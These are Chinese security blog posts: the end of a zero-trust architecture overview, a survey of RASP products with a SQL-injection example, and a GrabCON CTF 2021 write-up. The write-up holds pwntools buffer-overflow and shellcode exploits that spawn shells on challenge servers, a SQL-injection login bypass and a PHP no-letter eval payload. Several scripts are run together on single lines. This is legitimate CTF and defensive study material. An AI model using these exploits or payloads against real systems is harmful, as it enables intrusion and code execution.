b)总体架构

图四

零信任体系总体架构如图四所示，其包含两个核心部分：安全基础设施以及安全控制服务。

i.安全基础设施

安全基础设施部分相当于零信任体系中的策略引擎，划分为密码支撑体系和可信身份管控两个模块：

密码支撑体系(PKI/CA)的作用是，对不同对象，如人员、设备、应用、服务等提供数字证书管理服务。

可信身份管控则依托密码支撑体系，以身份为中心，对不同对象进行规范化统一管理。通过身份认证服务，实现用户、应用、设备等实体身份鉴别；通过授权管理服务，基于RBAC，ABAC等授权模型，实现细粒度的授权管理与鉴权控制等功能；通过安全审计服务，采集应用系统的运行记录、操作日志、性能指标，并进行统一的规范化处理和综合分析。安全控制服务

ii.安全控制服务

零信任体系架构中另一个核心部分是安全控制服务，其相当于零信任体系中的策略管理员，基于零信任网络环境下以身份为中心进行访问控制的特点，建设智能网关管理平台，作为认证与访问控制策略的大脑，对接密码支撑体系和可信身份管控平台，从而制定各类安全策略。

iii.安全管理中心

是集成多个零信任体系的辅助系统，基于密码态势感知服务，提供其所属设备台账管理、密码应用合规性分析、密码有效性分析，对不同对象行为日志进行收集、安全审计及追踪溯源等。

iv.标准接口规范

在部署零信任体系过程中，需要编制相关标准接口规范，如密码支撑体系接口标准、可信身份管控平台接口标准及产品接入规范，不同类型的网关对接接口规范等，保证其适配、对接合理、合规及便利。

c)逻辑架构

d)零信任体系组成

安全基础设施实现零信任体系核心组件以及零信任算法的两部分的功能，包括密码支撑和可信身份管控两个模块。

安全控制服务为零信任体系辅助系统的一部分，本文简单介绍其中智能网关管理和可信接入网关两部分的内容。

i.密码支撑

密码支撑部分采用PKI/CA技术建设，同时部署证书签发系统、注册审核系统、密钥管理系统、目录服务系统、证书状态查询系统，并部署移动制证系统，配合RA系统为移动设备制作数字证书。

ii.可信身份管控

可信身份管控平台包括身份管理、权限管理、认证管理、应用管理、安全审计等模块。实现设备、用户、应用等实体的全面身份化，实现网络中各客体资源的唯一标识化，并对网络中各资源对象通过单向或叠加的强认证技术，将所有的业务隐藏，通过安全控制服务实现对设备和用户的持续评估和持续认证，实现访问控制策略的动态调整，给予受控资源的动态访问。

iii.智能网关管理

智能网关管理平台是零信任网络环境下的智能控制器，是构建所有认证与访问控制策略的大脑。可对接PKI基础设施和可信身份管控平台，构造用于网关的RBAC/ABAC双模型访问控制策略，并可对异地部署的不同网关提供统一的策略推送管理。

智能网关管理平台对网络中的用户、设备、应用进行关联性分析，并进行持续的安全评估与鉴别，动态生成新的安全策略，推送到客户端和不同的网关节点进行强制执行。

iv.可信接入网关

可信接入网关基于零信任模型设计，在传统的PKI强认证基础上，加入了可组合的多因子认证机制，结合动态上下文环境检测，在不同的接入通道上可以为用户提供一致的，细粒度的访问控制。

如图五所示，可信接入网关由集中管理平台动态控制多个网关的执行策略，实现分布式、可弹性扩展的边界防护。

图五

4.零信任技术方案

目前，主流的零信任实施技术主要有三种，分别是SDP（软件定义边界）、微隔离以及增强身份认证，本文主要介绍SDP和微隔离。

a)SDP(软件定义边界)

SDP架构是由国际云安全联盟在2014年提出的第一个落地的零信任技术方案，主要包括三大组件：SDP控制器,，SDP连接发起主机（IH），SDP连接接受主机(AH)，如图六所示。SDP控制器确定哪些IH, AH主机可以相互通信，可以与外部认证服务进行信息交互，例如认证系统、地理位置、身份服务器等。SDP连接发起主机IH和接受主机AH会直接连接到SDP控制器，通过控制器与安全控制信道的交互来管理。

以此，企业典型SDP应用方案包括三个部分：客户端、管控平台、应用网关。管控平台和应用网关可采用云平台和私有化部署，应用网关部署在客户端与企业本地信息系统或云部署信息系统之间。按照SDP的设计原则，SPD实施隐藏服务器地址和端口，扫描不被发现，实现网络隐身。用户只有应用层访问权限，无网络级访问。在连接服务器之前，先验证用户和设备合法性后连接。

图六

b)微隔离

微隔离的概念最早由Vmware在发布NSX产品正式提出，是一种能够适应虚拟化部署环境，能够识别和管理云平台内部流量的一种隔离技术，其核心是对全部东西向流量的可视化识别与访问控制。

通过这种方法，企业可以将单个或群组资源放置在由网关安全组件保护的，自身网段上来实现零信任体系。企业将网关设备作为PEP来保护每个资源或资源组。这些网关设备动态授权来自客户端资产的访问请求。根据模型不同，网关可以是唯一的PEP组件，也可以是由网关和客户端代理组成的多部分PEP的一部分。

5.后续内容

在后续的分享中，会对零信任体系进行更深一步的介绍，重点为典型应用场景的零信任体系设计及分析、围绕零信任体系的信息安全创新。

a)典型应用场景的零信任体系设计及分析

典型应用场景的零信任体系设计及分析部分中，会对目前已落地一些零信任体系案例进行介绍和分析，目前安恒、奇安信、深信服、启明星辰等厂商都已有落地的零信任解决方案，其效果不论，但已经迈出了零信任落地最初的一步。

b)围绕零信任体系的信息安全创新

围绕零信任体系的信息安全创新方面，主要从四个方面展开，SaaS安全，Web安全，云身份、下一代防火墙，这些内容会在以后的分享中进一步介绍。

阅读原文

跳转微信打开

RASP关键技术与相关产品调研

Wed, 15 Sep 2021 14:38:00 +0800

c3cili4 2021-09-15 14:38

RASP（Runtime application self-protection，运行时应用自我保护）是一种新型应用安全保护技术，能实时检测和阻断攻击，使应用程序具备自我保护能力

1.RASP技术概述

RASP（Runtime application self-protection，运行时应用自我保护）是一种新型应用安全保护技术，能实时检测和阻断攻击，使应用程序具备自我保护能力，当应用程序遭受到实际攻击伤害，就可以自动对其进行防御，而不需要进行人工干预，并且应用程序无需在编码时进行任何的修改，只需进行简单的配置即可。

用户访问Web应用时，首先经过防火墙、waf等边界防护设备，然后该请求才会到达应用服务器，而RASP的检测和保护功能就是在应用程序运行的系统上运行的，它会拦截从应用程序到系统的所有调用，确保它们是安全的，并直接在应用程序内验证数据请求。

1.1.Java RASP和PHP RASP

Java和PHP的相似之处在于，在编译与执行过程中，编译器首先会将源代码转换为字节码指令流再使用对应的解释器执行字节码指令，区别在于PHP生成的中间代码是可以由zend引擎执行的opcode，而java则是生成可以由JVM执行的字节码。PHP的opcode也可看作一种字节码的表示形式，与java的字节码类似，均为编译过程中产生的中间代码。

而RASP技术的关键就是在执行指令前对字节码（opcode）指令进行修改从而hook关键函数进行安全检测。

1.1.1 Java RASP

Java支持以JavaAgent的方式，在服务器启动时，动态修改Java字节码，对敏感操作的函数进行hook，比如:数据库操作、文件读取、写入操作、命令执行等等。其架构如下图所示：

启动时首先会进入 javaagent 的 premain 函数，该函数会在 main 函数之前预先执行。java提供一个名为Instrumentation的API接口，可用于类定义动态改变和操作。开发者可以在一个普通Java程序（带有 main 函数的 Java 类）运行时，通过 – javaagent参数指定一个特定的 jar 文件（包含 Instrumentation 代理）来启动 Instrumentation 的代理程序。

接着进行初始化配置，对load class 操作进行插桩，当有类被 ClassLoader 加载时候，会把该类的字节码先交给自定义的 Transformer 处理。

自定义 Transformer 会判断该类是否为需要 hook 的类，如果是会将该类交给ASM处理。ASM框架（一个比较方便的字节码操作框架，可用于实现动态修改字节码的操作）会逐步解析每个方法，对需要hook的方法进行字节码的修改通常会在方法的开头或者结尾插入进入检测函数的字节码。

最后，把hook好的字节码返回给Transformer从而载入JVM执行。

1.1.2 PHP RASP

同样，PHP也支持对PHP内核做类似的操作，PHP支持PHP扩展，可以利用Zend引擎API来hook opcode，监控敏感函数。

（1）预加载

PHP的任何扩展模块，都会依次执行模块初始化（MINIT）、请求初始化（RINIT）、请求结束（RSHUTDOWN）、模块结束（MSHUTDOWN）四个过程。RASP预加载主要在MINIT阶段实现。

（2）hook函数并检测

在PHP中，hook函数中比较好的方式有两种，分别是 Hook Opcode 和 Hook内部函数，PHP RASP可以使用这两种方式来hook传播污染的函数。

1）Hook Opcode

实现Hook Opcode 功能只需要改变 Hook Opcode 对应的处理函数即可， Zend引擎提供了一个现成的接口：zend_set_user_opcode_handler，在模块初始化（MINIT）调用该接口对opcode进行劫持从而改变代码的运行结构转而执行检测函数

2）Hook内部函数

通过修改zend_internal_function的handler来hook PHP中的内部函数，handler指向的函数用C或者C++编写，可以直接执行。通过修改zend_internal_function结构体中handler的指向，待完成检测函数的操作后再调用原来的处理函数即可完成hook。

这两种方式皆可实现Hook函数，hook opcode方法只需要对几种Opcode类型进行hook，后续Hook的敏感函数可以自行添加，因此实现简单；而hook 内部函数需要对敏感函数进行逐一替换，比较繁琐，但由于该方式修改的是全局函数表的handler，相对于hook opcode方法更底层，可检测到越过Opcode进行的函数执行，比起第一种方式更为可靠。

在完成对敏感函数调用行为的监控后，便可根据函数的参数制定相应的策略，对不同类型的关键函数进行安全检测，如文件类可以关注是否读取了敏感文件, 数据库操作类是否语法结构发生了变化等等。

由于RASP技术在opcode层面hook了敏感函数，因此可以对抗常见的一些加密、拼接、编码等混淆技术。以下是一个经过拼接以及base64双重编码的一句话木马：

使用vld扩展对该木马进行opcode提取，可以得到如下的opcode序列，可以看到opcode序列还原了eval函数所对应的字节码指令。

1.2 关键技术

1.2.1 动态污点跟踪

动态污点跟踪技术常被用于代码调试和分析中，其主要思想就是先认定一些数据源是可能有害的，被污染的，从而对恶意代码进行分析。动态污点跟踪的三个要素是污染源、污染传播策略和沉降点。

在RASP中，污染源可以看作是所有的HTTP输入，随着这些被污染变量的复制、拼接等一系列操作，其他变量也会被污染，即污染的传播。这些被污染的变量作为参数传入敏感函数以后，可能导致安全问题，这些敏感函数就是沉降点。而污染传播策略的制定影响对RASP的准确性有很大的影响。传播策略过于严格会导致漏报，传播策略过于宽松会增加系统开销。

RASP的污染传播策略是变量的复制、赋值和大部分的字符串处理等操作传播污染。动态污点跟踪的一个好处是如果一些敏感函数的参数没有被污染，那么我们就无需对它进行安全检查。污染的传播过程其实就是hook对应的函数。

1.2.2 基于词法分析的检测算法

RASP可以和传统WAF一样，使用规则匹配对输入进行检测，但是对于大多数的代码注入漏洞，RASP采用的是利用词法分析来检测漏洞。

代码注入漏洞，是指攻击者可以通过Web请求将payload注入某种代码中，导致其被后台当做代码执行而产生的漏洞。而这些代码一旦被攻击者注入，则会改变原有的代码逻辑，也必然会改变代码的抽象语法树结构，而抽象语法树是token根据一定语法结构组合而成的，因此，只需要对代码部分进行词法分析，判断HTTP请求中的输入是否在词法分析的结果中占据了多个token，就可以判断是否形成了代码注入。

以SQL语句为例，词法分析的主要作用是将SQL语句分割成数据和代码。经过词法分析，Web层就可以判断对SQL语句的字符串处理是否改变了SQL的逻辑。百度的开源软件OpenRASP使用的SQL注入检测算法，就是通过词法分析实现的。如当攻击者发起以下请求：

?id=1’UNION SELECT passwd FROM users

在后台执行该SQL查询语句，OpenRASP会检测到包含攻击者注入代码的完整SQL语句：

SELECT * FROM users WHERE id='1' UNION SELECT passwd FROM users

OpenRASP便可以关联数据库的查询语句和Web请求参数，实现零规则SQL注入检测。具体实现如下：

首先通过词法分析将SQL语句解析为token序列：

['SELECT','*','FROM','users','WHERE','id','=','1','UNION','SELECT','passwd','FROM','users']

然后解析SQL语句在去掉用户输入后的token序列：

[ 'SELECT','*', 'FROM', 'users', 'WHERE', 'id', '=' ]

当token个数相差超过2，即表明当前的查询语句逻辑发生了改变，也就意味着这里就存在SQL注入漏洞。

词法分析通常通过有限状态机（DFA）来完成，不同的代码注入使用的DFA是不一样的，命令注入的DFA是基于shell语法构建的，文件包含的DFA是基于文件路径的词法构建的。

2. RASP与WAF

2.1产品特性

	RASP	WAF
部署	单独部署在应用服务器上，嵌入在应用程序内部，应用代码无感知（如java程序启动时加上–javaagent rasp.jar参数即可）；开发语言强相关，但防护插件可共用	外部边界入口统一部署；支持透明(串联)、旁路、反向代理三种方式；需要进行大量测试和配置，才能充分涵盖应用程序
准确性	只在可能发生攻击的关键函数调用处检查是否有恶意内容输入。并且监视输入和输出数据以及整个数据逻辑流。	基于模式匹配等方式对所有输入内容均进行检测。
可靠性	不会在高负荷情况下进入“失效开放”状态——无论服务器负载如何，总会对代码进行检测。	可能成为单一故障点；可能会在高负荷情况下进入“失效开放”状态。
可视性	可以向开发人员提供详细的攻击路径和攻击信息。	没有提供有关应用程序的详尽信息。
网络协议	不受协议限制，可以轻松地处理各种协议，如HTTP、HTTPS、AJAX、SQL和SOAP	只能处理能解析的协议
语言涵盖情况	理论上不限制语言，但每种语言需要开发单独的探针	不限语言；不受程序设计语言类型的限制

2.2 RASP相比于WAF的优势和劣势

2.2.1 优势

（1）更少的误报

WAF基于请求特征监测攻击，通常无法得知攻击是否成功，对于扫描器的踩点行为、nday扫描，一般会产生大量报警。RASP运行在应用内部，失败的攻击不会触发检测逻辑，所以一旦报警都是成功的攻击。

（2）更少的漏报

以SQL注入为例，WAF等边界设备只能看到请求信息。RASP不但能够看到请求信息，还能看到完整的SQL语句，并进行关联。如果SQL注入让服务器产生了语法错误或其他异常，RASP引擎也能够识别和处理。

（3）可以对抗未知漏洞。

发生攻击时，WAF等边界防护设备无法掌握应用下一步的动向。RASP技术可以识别出异常的程序逻辑，比如反序列化漏洞导致的命令执行，因此可以对抗未知漏洞。

（4）更多的应用覆盖（HTTP/HTTPS/AJAX/SQL与SOAP，无视编码和加密）

2.2.2 劣势

（1）技术栈太多时使用不方便，存在技术难度

（2）对服务器性能有一定的影响且需要在每个服务器上部署

（3）RASP自身代码的漏洞无法检测

比如，OpenRASP在某版本中使用了受漏洞影响的FastJson库来处理相应的json数据，那么当攻击者在发送FastJson反序列化攻击payload的时候就会造成目标系统被RCE。所以在最新的OpenRASP中，统一使用了较为安全的Gson来处理json字符串。

3. RASP产品

3.1. 百度OpenRASP

https://rasp.baidu.com/doc/usage/web.html

3.1.1 主要功能

（1）OWASP TOP10攻击检测

（2）服务器安全基线检查，如后台弱口令、php的配置审计等

（3）应用加固

（4）统一管理后台

（5）SIEM/SOC集成

3.1.2 支持的服务器

目前支持 Java 和 PHP 两种开发语言，支持 Tomcat 6-11, JBoss 4-16, Jetty 7-9, SpringBoot 1-2, WebSphere 7-9, WebLogic 10-12, PHP 5-7 等服务器。另外，OpenRASP 提供的IAST解决方案，相比于与传统的DAST方案有着极大提升。漏洞检测无需动态爬虫或者旁路代理，扫描更全面；结合应用探针准确的识别漏洞类型，通过针对性扫描大幅度提升检测效率；商业版新增的动态污点追踪能力，还可以在不扫描的情况下，预判接口是否存在漏洞。

3.2. 国内其他RASP产品

3.2.1 灵蜥安全

http://www.lingxe.com/introduction.html

灵蜥安全是一款云安全应用防护系统，与应用程序的运行环境和开发语言无缝结合并高度融合。通过修复应用自身内部缺陷与漏洞，使应用具备攻击免疫能力，并以可视化的方式呈现攻击与防御情况。

灵蜥由系统云端与嵌入式安全脚本两部分构成，嵌入式安全脚本部署于受防护Web服务器，以加密通讯方式通过Internet网络与云端建立通信，组成以平台端为核心的星型网络拓扑结构；同时具备自我防护能力，免学习、低误判、高精度、抗干扰，可图形呈现、统一管理、可视化分析全局把控；保持网络原有架构，即插即用方便快捷，实时安全告警，威胁及时掌握，从而抵御未知威胁。

3.2.2 安数云RASP

http://www.datacloudsec.com/#/product-4

安数云RASP的主要功能如下：

（1）WEB攻击实时防御

有效防御SQL注入、XSS跨站脚本、木马上传、防扫描、防Structs2攻击、防命令注入、防任意文件删除、防任意文件读取、防任意文件上传、防CSRF攻击等，实现了HTTP协议校验、XPATH注入防护、SSRF命令注入防护、反序列化攻击防护等、敏感信息泄露、cookie安全防护、错误页面安全防护、请求方法限制防护等。

（2）智能精准实时防控

安数云RASP WAF采用B/S架构，提供了简单易用WebUI操作界面，用户登录之后能够对RASP WAF进行详细的配置管理，能够添加、编辑及删除被防护主机及对应的安全策略，能够管理系统统计日志及报表，能够实现对系统的远程管理及维护。

3.2.3 云鲨RASP（悬镜）

https://cg.xmirror.cn/

云鲨RASP可监控和阻止绝大多数类型对应用程序的攻击。除了全面覆盖OWASP TOP10及其它常见漏洞外，还可以抵御传统WAF无法识别的攻击，如针对未知漏洞和业务逻辑漏洞的利用攻击。

相比于传统WAF，云鲨RASP具有以下特点：无需频繁调整、无需规则匹配、无误拦误报、超低性能消耗、无需停机或源代码更改即可修复CVE、防御非HTTP攻击、防御未知缺陷、防止绕过。

3.3 国外RASP产品

3.3.1 Prevoty（Imperva）

https://www.imperva.com/products/runtime-application-self-protection-rasp/?redirect=Prevoty

（1）功能

该产品可以预防0day攻击，支持OWASP TOP10的攻击检测，主要有以下几种防御功能：

1）攻击：点击劫持、HTTP 响应拆分、HTTP 方法篡改、大量请求、格式错误的内容类型、路径遍历、未经验证的重定向、软件供应链攻击

2）注入：命令注入跨站脚本、跨站请求伪造、CSS & HTML 注入、数据库访问冲突、JSON & XML 注入、OGNL注入、SQL注入

3）脆弱性：不安全的 Cookie 和传输、记录敏感信息、未经授权的网络活动、未捕获的异常、易受攻击的依赖项、弱认证、弱浏览器缓存、弱密码

（2）支持的平台

3.3.2 Fortify Application Defender

Application Defender 可以防止生产应用程序中的攻击。支持区分 Java 和 .NET 应用程序中的危险攻击和合法请求；具有代码级的可见性，通过为开发人员提供代码行详细信息，提供了日志记录可见性。无需更改源代码，即可向任何 SIEM 或日志管理器发送日志，实现合规和更广泛的应用程序安全可视性；强大的分层防御，抵御各种应用安全攻击、利用尝试和其他安全违规行为，比如 SQL 注入、跨站脚本攻击和侵犯隐私。

3.4 RASP产品总结

现有的RASP产品大都支持OWASP TOP10攻击的检测与防御。但目前国内成熟的RASP产品相对较少，现有的RASP产品大部分仅支持Java 、PHP、python、Nodejs、Ruby等语言中的一种或几种，覆盖面还不够广，对于开发支持多种语言的RASP有一定的技术难度，仍需进一步完善。

4. OpenRASP demo演示

由于百度的OpenRASP是开源的，因此我们使用该产品来进行demo的演示，从而更加直观地感受到RASP产品是如何防护应用程序免受外部攻击的。

4.1 php服务器

在php服务器上搭建并部署OpenRASP，使用如下图所示的官方测试用例进行演示。测试用例包含常见的web应用攻击，包括列目录、任意文件读取、命令执行、ssrf、文件上传等。

以第一个测试用例为例，演示当部署了OpenRASP之后，攻击者的scandir手段是否会被检测并拦截

点击Linux不正常调用，发现被rasp拦截并返回了以下页面：

在rasp日志中可以看到本次拦截所记录的日志

4.2 tomcat服务器

在tomcat服务器上搭建并部署OpenRASP，使用官方测试用例和fastjson反序列化用例进行演示。测试用例包含常见的web应用攻击，包括目录遍历、命令执行、ssrf、fastjson反序列化等。

遍历目录攻击演示：

Fastjson反序列化攻击演示：

5. 总结

传统的网络安全架构重点在于网络边界防护，通过在边界上部署防火墙、WAF、IDS/IPS等安全产品进行重重防护，而内网安全却没有受到重视。RASP不仅服务于南北向流量风险，还可以防护东西向流量，它可以嵌入在应用程序内部，应用代码无感知，更了解应用程序上下文，方便定位漏洞信息，产生更少的误报和漏报，对各种绕过手法具有更强的防护能力；但RASP会对服务器的性能造成影响，推动部署落地相对困难，且对不同的技术栈需要开发相应的探针，具有较大的技术难度。不过随着DevSecOps框架的发展以及云、容器等基础设施和技术的不断成熟，未来可能有更优的RASP部署方案，为web应用提供更细致入微的安全检查与防护。

阅读原文

跳转微信打开

GrabCON CTF 2021 WP

Mon, 06 Sep 2021 11:13:00 +0800

原创 c3cili4 2021-09-06 11:13

GrabCON CTF 2021的wp

1、Pwn

1.1、Easybin

程序直接给了后门函数system('/bin/sh')，return2text即可获得shell

from pwn import *sh=remote("35.205.161.145",49153)shell=0x401146payload=b'a'*0x38+p64(shell)sh.sendline(payload)sh.interactive()

1.2、Can You?

这题开了canary，但存在格式化字符串漏洞，可以读取canary的值，然后再进行溢出修改返回地址为system('/bin/sh')的地址

首先使用pwndbg调试，在printf处下断点，运行至此处输入%x.%x.%x.%x，得到第一个参数值为0xffffcea8

在栈中找到该值

可以知道格式化字符串第一个参数的地址为0xffffce90，而canary在ebp-0ch处，即0xffffcf0c

由此可以计算0xffffcf0c-0xffffce90=124，即31个字节，编写exp如下

from pwn import *sh=remote("35.246.42.94",31337)sh.recvline()payload1=b'%31$p'sh.sendline(payload1)canary=int(sh.recvline(),16)print(canary)system=0x08049236payload2=b'a'*0x64+p32(canary)+b'b'*12+p32(system)sh.sendline(payload2)sh.interactive()

1.3、Pwn CTF

该题未开栈不可执行保护，并且泄露了输入字符串的首地址，可以构造shellcode，ret2shellcode

from pwn import *sh=remote('35.246.42.94',1337)sh.recvuntil('some ')addr=sh.recvuntil('!')[-11:-1]print(addr)addr=int(addr,16)shellcode=asm(shellcraft.i386.sh(),arch = 'i386', os = 'linux')payload=shellcode+b'a'*(0x12a-len(shellcode)+4)+p32(addr)sh.sendline(payload)sh.interactive()

2、Crypto

2.1、Warm-up

下载下来是一串

S01ZRENXU1NJVkhGUVZKUkpaRkZNMlNLSTVKVENWU0xLVlZYQVlLVElaTkVVVlRNS0pIRkc2U1dKVkpHV01LWEtaQ1VVVENXTlJORlNVS1dOUkdGS01EVUs1S0dXVlNLS1pDWFFUQ1ROUllFT1VUTE1STFZDTUxFSk5MR1c0Q0lLWVlEQ1RDWEtWMkZNVjJWTkJKRk1SS09MQktHV05EWktKV0U0VlNOTlJTRVdWVEtLSkxWR01CUklOTEdXNUNQS05XRkVSQ1dLWkhFSVVaUk9CTUZFMjJXS1ZKVENXU0tLWlZWVVJTVUdGTEZLVkNGR0ZIVTRSU1ZQRkdXWVRTTUtOVlRLVEtTR0ZSVEFVSlFNUkdGSVZUTUs1SkZNVExaS1pWWElWMk5OTkxFNFZUS0pKTFZJUkxRSlZKR1dNS1RLTVlEU1RDVk5OMkVRVjJXSlpLRk1WTFVKTkpUQ1VTRUtaV0U0VjJTR0JORklVU1dNUkxGTVJMVUpSSldXNkNYS0lZVlVSQ1RHQVlVT1ZDRk1STUU0VktPS0ZKVENTU0VLWldGTVZLUkdGU0U2VkxMTVJNVktNS1dNRktXV09LREtFWUZVVUNWTk4yRVFVWlJPQkdGTVJLT0s1S1RBM0NNS0pWWFFTQ1hLWlNFSVZMTE1SRFZJMjIySlJMR1dUU0hLSVlWVVMyV05OU0ZHVTMySkpGRksyM0VLVklWTVVTVUtSS1hJVDJXR0JORk1WTDJKSk1GRU1DMktOTEVLUlNXS05XRU1VQ1JOTlNFT1ZEMkpGNUZPVkxMR0ZKVEFXU09LWVlVNFJTVEdGWUVJVlJRTlJKRTIyWlZKNUtHV05LR0tWTEZVVkNXTk00VUdVM0xMSkZGSzIzWUtKSldXU1NMS0lZV0dNS1JHRkpFWVZMTEpaTVZLVlNPSlJLVEE1Q1NLNUtWRVZDV0tWSEZNVVJRSVVZRk0yMkdLWkpXVVZTSktaS0RBT0tRS1FZRFNVQ1JIVTZRPT09PQ==

根据题意就base64与base32一直解，各解5次出来结果

GrabCON{dayuum_s0n!}

2.2、Poke Ball RSA

e很大，考虑小解密指数d，使用wiener攻击求解d

n = 498934084350094415783044823223130007435556803301613073259727203199325937230080661117917023582579699673759861892703348357714077684549303787581429366922208568924252052118455313229534699860304480039147103608782140303489222166267907007839021544433148286217133494762766492655602977085105487216032806292874190551319e = 134901827939710543990222584187396847806193644190423846456160711527109836908087675183249532946675670587286594441908191054495871501233678465783530503352727362726294270065122447852357566161748618195216611965946646411519602447104878893524856862722902833460104389620397589021732407447981724307130484482495521398799c = 100132888193232309251839777842498074992587507373917163874335385921940537055226546911990198769720313749286675018486390873216490470403470144298153410686092752282228631590006943913867497072931343354481759219425807850047083814816718302223434388744485547550941814186146959750515114700335721173624212499886218608818import hashlibfrom Crypto.Util.number import *from gmpy2 import *class ContinuedFraction():    def __init__(self , numerator, denumerator):        self.numberlist = []    #number in continued fraction        self.fractionlist = []  #the near fraction list        self.GenerateNumberList(numerator , denumerator)        self.GenerateFractionList()
    def GenerateNumberList(self,numerator,denumerator):
        while numerator != 1:            quotient = numerator//denumerator            remainder = numerator % denumerator            self.numberlist.append(quotient)            numerator = denumerator            denumerator = remainder        def GenerateFractionList(self):        self.fractionlist.append([self.numberlist[0] ,1 ])        for i in range(1,len(self.numberlist)):            numerator = self.numberlist[i]            denumerator = 1            for j in range(i):                temp = numerator                numerator = denumerator + numerator * self.numberlist[i-j-1]                denumerator = temp            self.fractionlist.append([numerator,denumerator])            def Solve(a , b , c):    '''solve ax^2+bx+c=0 , return x1 , x2'''    delta = b**2 - 4 * a * c    if delta < 0:        return 0    if is_square(delta):        sqr_delta = isqrt(delta)        temp1 = -b + sqr_delta        temp2 = -b - sqr_delta        if temp1 % (2*a) != 0 or temp2 % (2*a) != 0:            return 0        else:            return [temp1//(2*a) , temp2//(2*a)]    else:        return 0def WienersAttack(e , N):    a = ContinuedFraction(e , N)    for i in a.fractionlist:        k = i[0]        d = i[1]        if k == 0:            continue        fai_N = (d * e - 1) // k        b = fai_N - N - 1        temp = Solve(1 , b , N)        if isinstance(temp ,list):            #print(d)            p ,q = temp            return d , p , q
d, p, q = WienersAttack(e, n)m=pow(c,d,n)print(long_to_bytes(m))#得到m为b'e=2,c=9019127052844164572606928250741960583163943438936945828390420331200602392329'#对c开根号得到flag:GrabCON{((^_^))}

2.3、Old Monk's Password

enc、enc1和enc2都是用flag加密后得到的密文，每次加密开始的i不同。因此只需还原出第一个加密的i即可根据加密逻辑编写解密脚本，得到flag

enc = b'\x0cYUV\x02\x13\x16\x1a\x01\x04\x05C\x00\twcx|z(((%.)=K%(>'enc1 = b'\x0bPPS\r\x0b\x02\x0f\x12\r\x03_G\t\x08yb}v+--*+*8=W,>'enc2 = b'\x07A[\x06\\\r\x15\t\x04\x07\x18VG]U]@\x02\x08&9&%\' 41".;'import codecsimport random'''class pass_w:    x = "hjlgyjgyj10hadanvbwdmkw00OUONBADANKHM;IMMBMZCNihaillm"    def encode(self, text, i = -1):        
        if i < 0 or i > len(self.x) + 1:            i = random.randint(0, len(self.x) + 1)
        out = chr(i)        for c in text:            out += chr(ord(c) ^ ord(self.x[i]))            i = (i + 1)%79                 
        return codecs.encode(out)'''x = "hjlgyjgyj10hadanvbwdmkw00OUONBADANKHM;IMMBMZCNihaillm"text=codecs.decode(enc1)i=ord(text[0])password=''for t in range(1,len(text)):  password+=chr(ord(text[t])^ord(x[i]))  i=(i+1)%79print(password)#得到password为817letmein40986728ilikeapples，用GrabCON包裹即为flag

2.4、The Anceint Temple

题目代码如下：

M, s, l, C = 7777771, [], 1337, [] n=[]flag = "REDACTED"k = [list(map(int, list(' '.join(bin(ord(i))[2:]).split()))) for i in flag]def num_gen(first, last):
   o = [[1]]                          cnt = 1                               while cnt <= last:       if cnt >= first:           yield o[-1][0]                  row = [o[-1][-1]]                   for b in o[-1]:        row.append(row[-1] + b)         cnt += 1                              o.append(row)        for i in num_gen(7, 13):       s.append(i)            for i in range(len(s)):    ni = ((l*s[i]) % M)               n.append(ni)for p in k:    C_curr = []    for (x,y) in zip(p, n):        C_ = x*y        C_curr.append(C_)    C += [sum(C_curr)]print(M, s, l, C, n)#M = 7777771#s = [203,877,4140,21147,115975,678570,4213597]#l = 1337#C = [15051976, 12005794, 3916945, 6470614, 7771050, 19992202, 17519217, 19419005, 13883825, 18691766, 13988655, 6979140, 14478779, 13988655, 8943599, 13883825, 25527382, 6384186, 13988655, 16461640, 25527382, 16224525, 6707729, 21488294, 25527382, 14392351, 6707729, 16733051, 12005794, 25527382, 6470614, 3916945, 7771050, 12711276, 21673277]

根据以上源码可知，该题将flag的每个字符转换成二进制形式，进行背包加密，每个背包的重量为数组n，每个字符的加密结果存在数组C中，使用ctf-wiki上的脚本进行解密

import binasciipubKey=[271411, 1172549, 5535180, 4940226, 7280926, 5026654, 2472985]nbit = len(pubKey)c = [15051976, 12005794, 3916945, 6470614, 7771050, 19992202, 17519217, 19419005, 13883825, 18691766, 13988655, 6979140, 14478779, 13988655, 8943599, 13883825, 25527382, 6384186, 13988655, 16461640, 25527382, 16224525, 6707729, 21488294, 25527382, 14392351, 6707729, 16733051, 12005794, 25527382, 6470614, 3916945, 7771050, 12711276, 21673277]f=''for i in range(len(c)):
  encoded = c[i]  #encoded=273226919366677  print "start"  # create a large matrix of 0's (dimensions are public key length +1)  A = Matrix(ZZ, nbit + 1, nbit + 1)  # fill in the identity matrix  for i in xrange(nbit):      A[i, i] = 1  # replace the bottom row with your public key  for i in xrange(nbit):      A[i, nbit] = pubKey[i]  # last element is the encoded message  A[nbit, nbit] = -int(encoded)
  res = A.LLL()  for i in range(0, nbit + 1):      # print solution      M = res.row(i).list()      flag = True      for m in M:          if m != 0 and m != 1:              flag = False              break      if flag:          print i, M          M = ''.join(str(j) for j in M)          # remove the last bit          M = M[:-1]          M = chr(int(M, 2))    print M    f+=M    print f#得到flag为GrabCON{kn4ps4ck_h45_g07_y0ur_baCK}

3、Web

3.1、E4sy Pe4sy

进去之后在登录框中用万能密码进行sql注入

username=admin'or 1=1#password=admin'or 1=1#

登录即可得到flag:GrabCON{E4sy_pe4sy_SQL_1nj3ct10n}

3.2、Basic Calc

一道典型的php无字母shell题，preg_match匹配输入中是否存在字母，存在的话进入die分支，不存在则进入eval函数执行

由于题中已经提供了eval函数，所以用取反构造system函数输入命令即可

eq=$_=~"%8C%86%8C%8B%9A%92";$__=~"%a0%af%b0%ac%ab";$___=$$__;$_($___[_]);&_=whoami

4、Reversing

4.1、Easy Rev

直接静态查看，比较输入和v2

运行得到flag

4.2、Unknow1

exeinfo查壳发现存在upx壳

去壳后ida动态调试，查询字符串定位到“Enter the password: “下断点

开始调试，到输入函数停止，输入123456789

回车，继续跟进，发现到0x401EBA处存在一处判断跳转，会跳转到失败分支，但其正下方就是成功分支，所以修改ZF标志位的值，使其不跳转

进入到成功分支，继续跟进，得到flag

4.3、Unknow2

查壳，发现存在UPX壳

去壳之后IDA打开，静态查看字符串，发现关键字符

在banner处下断点，尝试能否让程序走向输入密码分支

开始调试

结果失败，还是会直接退出且中间没有判断跳转点，所以继续进行静态分析，在main_one函数中找到可疑代码

尝试让程序走到main_one分支试试，向上追溯，在main_main函数处下断点，开始调试

一路F8直到0x000055B6E7319F96处发现有一个跳转逻辑跳过了main_one函数，所以修改ZF标志位，使其不跳转，再F7步入main_one函数

跟进，发现之前标记的关键词断点，执行过去之后控制台弹出输入密码字符

